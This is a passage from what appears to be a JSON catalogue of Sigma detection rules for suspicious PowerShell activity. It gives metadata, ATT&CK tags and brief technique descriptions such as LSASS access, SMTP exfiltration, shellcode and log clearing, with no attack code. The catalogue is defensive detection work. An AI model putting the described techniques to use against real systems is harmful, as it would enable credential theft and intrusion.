"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ], - "creation_date": "2022/02/01", - "filename": "posh_ps_run_from_mount_diskimage.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", - "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", - "value": "Security Software Discovery by Powershell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ], - "creation_date": "2021/12/16", - "filename": "posh_ps_security_software_discovery.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", - "value": "Powershell Exfiltration Over SMTP", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", - "https://www.ietf.org/rfc/rfc2821.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2022/09/26", - "filename": "posh_ps_send_mailmessage.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detect adversaries enumerate sensitive files", - "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", - "value": "Powershell Sensitive File Discovery", - "meta": { - "refs": [ - "https://twitter.com/malmoeb/status/1570814999370801158", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2022/09/16", - "filename": "posh_ps_sensitive_file_discovery.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", - "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "value": "Change PowerShell Policies to an Insecure Level - PowerShell", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", - "https://adsecurity.org/?p=2604", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/10/20", - "filename": "posh_ps_set_policies_to_unsecure_level.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrator script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Base64 encoded Shellcode", - "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "value": "PowerShell ShellCode", - "meta": { - "refs": [ - "https://twitter.com/cyb3rops/status/1063072865992523776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2018/11/17", - "filename": "posh_ps_shellcode_b64.yml", - "author": "David Ledbetter (shellcode), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", - "value": "Malicious ShellIntel PowerShell Commandlets", - "meta": { - "refs": [ - "https://github.com/Shellntel/scripts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/08/09", - "filename": "posh_ps_shellintel_malicious_commandlets.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "value": "Detected Windows Software Discovery - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", - "https://github.com/harleyQu1nn/AggressorScripts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518" - ], - "creation_date": "2020/10/16", - "filename": "posh_ps_software_discovery.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", - "value": "Powershell Store File In Alternate Data Stream", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2021/09/02", - "filename": "posh_ps_store_file_in_alternate_data_stream.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", - "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/15", - "filename": "posh_ps_susp_ad_group_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", - "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", - "value": "Suspicious Eventlog Clear", - "meta": { - "refs": [ - "https://twitter.com/oroneequalsone/status/1568432028361830402", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001" - ], - "creation_date": "2022/09/12", - "filename": "posh_ps_susp_clear_eventlog.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", - "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "value": "Powershell Directory Enumeration", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2022/03/17", - "filename": "posh_ps_susp_directory_enum.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell download command", - "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", - "value": "Suspicious PowerShell Download - Powershell Script", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_ps_susp_download.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", - "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", - "value": "Powershell Execute Batch Script", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/01/02", - "filename": "posh_ps_susp_execute_batch_script.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administration script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "value": "Suspicious Export-PfxCertificate", - "meta": { - "refs": [ - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", - "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], - "creation_date": "2021/04/23", - "filename": "posh_ps_susp_export_pfxcertificate.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", - "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", - "value": "Extracting Information with PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2021/12/19", - "filename": "posh_ps_susp_extracting.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", - "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", - "value": "Troubleshooting Pack Cmdlet Execution", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1537919885031772161", - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/06/21", - "filename": "posh_ps_susp_follina_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "value": "PowerShell Get-Process LSASS in ScriptBlock", - "meta": { - "refs": [ - "https://twitter.com/PythonResponder/status/1385064506049630211", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2021/04/23", - "filename": "posh_ps_susp_getprocess_lsass.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Powershell code that execute COM Objects", - "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "value": "Suspicious GetTypeFromCLSID ShellExecute", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2022/04/02", - "filename": "posh_ps_susp_gettypefromclsid.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", - "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", - "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", - "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1201" - ], - "creation_date": "2022/03/17", - "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of PowerShell to identify the current logged user.", - "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", - "value": "Suspicious PowerShell Get Current User", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/04/04", - "filename": "posh_ps_susp_get_current_user.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", - "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", - "value": "Suspicious GPO Discovery With Get-GPO", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1615" - ], - "creation_date": "2022/06/04", - "filename": "posh_ps_susp_get_gpo.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Get the processes that are running on the local computer.", - "uuid": "af4c87ce-bdda-4215-b998-15220772e993", - "value": "Suspicious Process Discovery With Get-Process", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ], - "creation_date": "2022/03/17", - "filename": "posh_ps_susp_get_process.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", - "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", - "value": "Suspicious Get-WmiObject", - "meta": { - "refs": [ - "https://attack.mitre.org/datasources/DS0005/", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546" - ], - "creation_date": "2022/01/12", - "filename": "posh_ps_susp_gwmi.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", - "value": "Suspicious Hyper-V Cmdlets", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.006" - ], - "creation_date": "2022/04/09", - "filename": "posh_ps_susp_hyper_v_condlet.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "uuid": "ed965133-513f-41d9-a441-e38076a0798f", - "value": "Suspicious PowerShell Invocations - Generic", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/12", - "filename": "posh_ps_susp_invocation_generic.yml", - "author": "Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Very special / sneaky PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "value": "Suspicious PowerShell Invocations - Specific", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_ps_susp_invocation_specific.yml", - "author": "Florian Roth (rule), Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", - "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", - "value": "Change User Agents with WebRequest", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2022/01/23", - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", - "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", - "value": "Suspicious IO.FileStream", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ], - "creation_date": "2022/01/09", - "filename": "posh_ps_susp_iofilestream.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "value": "Suspicious PowerShell Keywords", - "meta": { - "refs": [ - "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", - "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", - "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/02/11", - "filename": "posh_ps_susp_keywords.yml", - "author": "Florian Roth, Perez Diego (@darkquassar)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", - "value": "Suspicious Get Local Groups Information - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/12", - "filename": "posh_ps_susp_local_group_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", - "value": "Powershell Local Email Collection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114.001" - ], - "creation_date": "2021/07/21", - "filename": "posh_ps_susp_mail_acces.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", - "value": "PowerShell Deleted Mounted Share", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ], - "creation_date": "2020/10/08", - "filename": "posh_ps_susp_mounted_share_deletion.yml", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "level": "medium", - "falsepositive": [ - "Administrators or Power users may remove their shares via cmd line" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", - "value": "Suspicious Mount-DiskImage", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ], - "creation_date": "2022/02/01", - "filename": "posh_ps_susp_mount_diskimage.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", - "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", - "value": "Suspicious Connection to Remote Account", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110.001" - ], - "creation_date": "2021/12/27", - "filename": "posh_ps_susp_networkcredential.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on 